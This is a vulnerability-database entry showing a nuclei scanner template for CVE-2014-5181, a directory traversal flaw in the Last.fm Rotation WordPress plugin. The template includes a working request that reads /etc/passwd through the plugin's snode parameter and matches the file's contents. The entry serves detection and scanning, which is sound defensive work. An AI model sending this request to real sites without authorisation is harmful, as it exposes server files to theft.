Lucene search
K

Last.fm Rotation 1.0 - Path Traversal

🗓️ 23 Jun 2026 05:08:33Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

Last.fm Rotation 1.0 Directory Traversal vulnerability in WordPres

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2014-5181
6 Aug 201419:00
cve
Cvelist
CVE-2014-5181
6 Aug 201419:00
cvelist
EUVD
EUVD-2014-5079
7 Oct 202500:30
euvd
NVD
CVE-2014-5181
6 Aug 201419:55
nvd
Patchstack
WordPress Last.FM Rotation Plugin <= 3.3 - Local File Inclusion
6 Aug 201400:00
patchstack
Prion
Directory traversal
6 Aug 201419:55
prion
RedhatCVE
CVE-2014-5181
22 May 202504:14
redhatcve
WPVulnDB
Last.fm Rotation 1.0 - lastfm-proxy.php snode Parameter Remote Path Traversal File Access
19 Sep 201406:07
wpvulndb
id: CVE-2014-5181

info:
  name: Last.fm Rotation 1.0 - Path Traversal
  author: DhiyaneshDK
  severity: medium
  description: |
    Directory traversal vulnerability in lastfm-proxy.php in the Last.fm Rotation (lastfm-rotation) plugin 1.0 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the snode parameter.
  impact: |
    Remote attackers can read arbitrary files on the server, potentially leading to information disclosure or further exploitation.
  remediation: |
    Update to the latest version of the plugin or apply security patches to fix the vulnerability.
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2014-5181
    cwe-id: CWE-22
    epss-score: 0.04259
    epss-percentile: 0.89779
    cpe: cpe:2.3:a:last.fm_rotation_plugin_project:lastfm-rotation_plugin:1.0:*:*:*:*:wordpress:*:*
  metadata:
    vendor: last.fm_rotation_plugin_project
    product: lastfm-rotation_plugin
    framework: wordpress
  tags: wpscan,cve,cve2014,wp-cross-rss,wordpress,wp-plugin,lfi,wp,lastfm-rotation,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"/wp-content/plugins/lastfm-rotation/")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-content/plugins/lastfm-rotation/lastfm-proxy.php?snode=/etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a004630440220342ba8f8ad1fee3e10a6abc5b552574e9849fc43551daddf9a5314d3f4fb962402205a14fc97022384c79c3cd1b9a94d6eda47d816ac7e206b1098dc511a04d35f73:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 25
EPSS0.04259
21